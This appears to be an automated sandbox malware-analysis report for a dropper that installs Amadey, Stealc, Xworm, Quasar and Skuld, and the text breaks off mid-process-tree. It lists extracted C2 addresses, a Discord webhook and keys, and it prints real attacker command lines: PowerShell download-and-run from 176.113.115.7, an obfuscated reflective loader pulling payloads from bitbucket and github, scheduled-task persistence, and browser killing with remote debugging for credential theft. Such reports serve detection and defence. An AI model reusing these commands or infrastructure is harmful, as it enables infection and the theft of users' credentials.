Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    22/03/2025, 16:29

General

  • Target

    random.exe3.exe

  • Size

    938KB

  • MD5

    bcefbd57340b3f8c39699195c2946d69

  • SHA1

    73eb2f2c99d6a7141fc577d9375ae3992ac58b4a

  • SHA256

    8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec

  • SHA512

    a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

skuld

C2

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

C2

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 3 IoCs
  • Detect Xworm Payload 5 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • Skuld family
  • Skuld stealer

    An infostealer written in Go.

  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 16 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 46 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 57 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 24 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\random.exe3.exe
        "C:\Users\Admin\AppData\Local\Temp\random.exe3.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn ka3k7maPOtF /tr "mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn ka3k7maPOtF /tr "mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2996
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2652
            • C:\Users\Admin\AppData\Local\TempMWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE
              "C:\Users\Admin\AppData\Local\TempMWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:288
                • C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe
                  "C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:2384
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c 1.bat && 2.js
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2396
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic cpu get name
                      9⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2340
                    • C:\Windows\system32\find.exe
                      find "QEMU"
                      9⤵
                        PID:664
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell "$dosigo = '<several kilobytes of base64 with A replaced by @, omitted>';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:448
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                          10⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:820
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                        9⤵
                          PID:1756
                    • C:\Users\Admin\AppData\Local\Temp\10301270101\f08618d6a4.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301270101\f08618d6a4.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:1480
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c schtasks /create /tn gZTOOmaPtZC /tr "mshta C:\Users\Admin\AppData\Local\Temp\tDCwMdHcr.hta" /sc minute /mo 25 /ru "Admin" /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:1020
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn gZTOOmaPtZC /tr "mshta C:\Users\Admin\AppData\Local\Temp\tDCwMdHcr.hta" /sc minute /mo 25 /ru "Admin" /f
                          9⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:2188
                      • C:\Windows\SysWOW64\mshta.exe
                        mshta C:\Users\Admin\AppData\Local\Temp\tDCwMdHcr.hta
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1264
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AVGPJYRDYYLGNR77QNVSEZ5G4HW58H16.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                          9⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Downloads MZ/PE file
                          • System Location Discovery: System Language Discovery
                          PID:2964
                          • C:\Users\Admin\AppData\Local\TempAVGPJYRDYYLGNR77QNVSEZ5G4HW58H16.EXE
                            "C:\Users\Admin\AppData\Local\TempAVGPJYRDYYLGNR77QNVSEZ5G4HW58H16.EXE"
                            10⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2888
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\10301280121\am_no.cmd" "
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2284
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 2
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Delays execution with timeout.exe
                        PID:2916
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2536
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2556
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2484
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2360
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2272
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2612
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /tn "Vgletmayucf" /tr "mshta \"C:\Temp\Nb3R50wmd.hta\"" /sc minute /mo 25 /ru "Admin" /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:2392
                      • C:\Windows\SysWOW64\mshta.exe
                        mshta "C:\Temp\Nb3R50wmd.hta"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Modifies Internet Explorer settings
                        PID:2580
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                          9⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Downloads MZ/PE file
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2340
                          • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                            "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                            10⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1668
                    • C:\Users\Admin\AppData\Local\Temp\10301300101\cb06c496d7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301300101\cb06c496d7.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:3028
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 3028 -s 36
                        8⤵
                        • Loads dropped DLL
                        PID:2068
                    • C:\Users\Admin\AppData\Local\Temp\10301310101\a4cff801f5.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301310101\a4cff801f5.exe"
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2168
                    • C:\Users\Admin\AppData\Local\Temp\10301320101\ee82d42cb7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301320101\ee82d42cb7.exe"
                      7⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2752
                    • C:\Users\Admin\AppData\Local\Temp\10301330101\0b6be3303c.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301330101\0b6be3303c.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1356
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM firefox.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2940
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM chrome.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:320
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM msedge.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2196
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM opera.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2900
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /F /IM brave.exe /T
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:596
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                        8⤵
                          PID:1048
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                            9⤵
                            • Checks processor information in registry
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:932
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.0.1055552953\1272439488" -parentBuildID 20221007134813 -prefsHandle 1224 -prefMapHandle 1216 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d83eb3b4-5f63-425c-8204-18a5990a9376} 932 "\\.\pipe\gecko-crash-server-pipe.932" 1308 12ac2b58 gpu
                              10⤵
                                PID:1468
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.1.519260175\1878158687" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae8b57ef-0dae-4757-b734-fb6d9a316265} 932 "\\.\pipe\gecko-crash-server-pipe.932" 1504 f73f58 socket
                                10⤵
                                  PID:1552
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.2.1446915490\1179667951" -childID 1 -isForBrowser -prefsHandle 2088 -prefMapHandle 2084 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {262b92a7-44ae-43e1-a14f-b098b750a833} 932 "\\.\pipe\gecko-crash-server-pipe.932" 2100 12a5e358 tab
                                  10⤵
                                    PID:1884
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.3.1905500877\1921332935" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9968f50d-4d52-4ef3-b09a-386654f3dc4e} 932 "\\.\pipe\gecko-crash-server-pipe.932" 2908 f64558 tab
                                    10⤵
                                      PID:2672
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.4.413139501\1261447361" -childID 3 -isForBrowser -prefsHandle 3832 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {91b69759-88d6-480b-8869-0a206c723713} 932 "\\.\pipe\gecko-crash-server-pipe.932" 3844 21072f58 tab
                                      10⤵
                                        PID:2932
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.5.2044931708\152666890" -childID 4 -isForBrowser -prefsHandle 3952 -prefMapHandle 3956 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {29da2c5c-1f4e-4d8e-a9d0-14c71fef6dab} 932 "\\.\pipe\gecko-crash-server-pipe.932" 3940 21070b58 tab
                                        10⤵
                                          PID:2556
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="932.6.454103800\100205170" -childID 5 -isForBrowser -prefsHandle 4120 -prefMapHandle 4124 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 828 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8adc212d-439e-4d25-9827-4f3d7211dedc} 932 "\\.\pipe\gecko-crash-server-pipe.932" 4108 21340258 tab
                                          10⤵
                                            PID:2248
                                    • C:\Users\Admin\AppData\Local\Temp\10301340101\ddc845828c.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10301340101\ddc845828c.exe"
                                      7⤵
                                      • Modifies Windows Defender DisableAntiSpyware settings
                                      • Modifies Windows Defender Real-time Protection settings
                                      • Modifies Windows Defender TamperProtection settings
                                      • Modifies Windows Defender notification settings
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Windows security modification
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2552
                                    • C:\Users\Admin\AppData\Local\Temp\10301350101\cd3dfab0e4.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10301350101\cd3dfab0e4.exe"
                                      7⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Checks processor information in registry
                                      • Modifies system certificate store
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3236
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        8⤵
                                        • Uses browser remote debugging
                                        • Enumerates system info in registry
                                        PID:2964
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6619758,0x7fef6619768,0x7fef6619778
                                          9⤵
                                            PID:2272
                                          • C:\Windows\system32\ctfmon.exe
                                            ctfmon.exe
                                            9⤵
                                              PID:3504
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
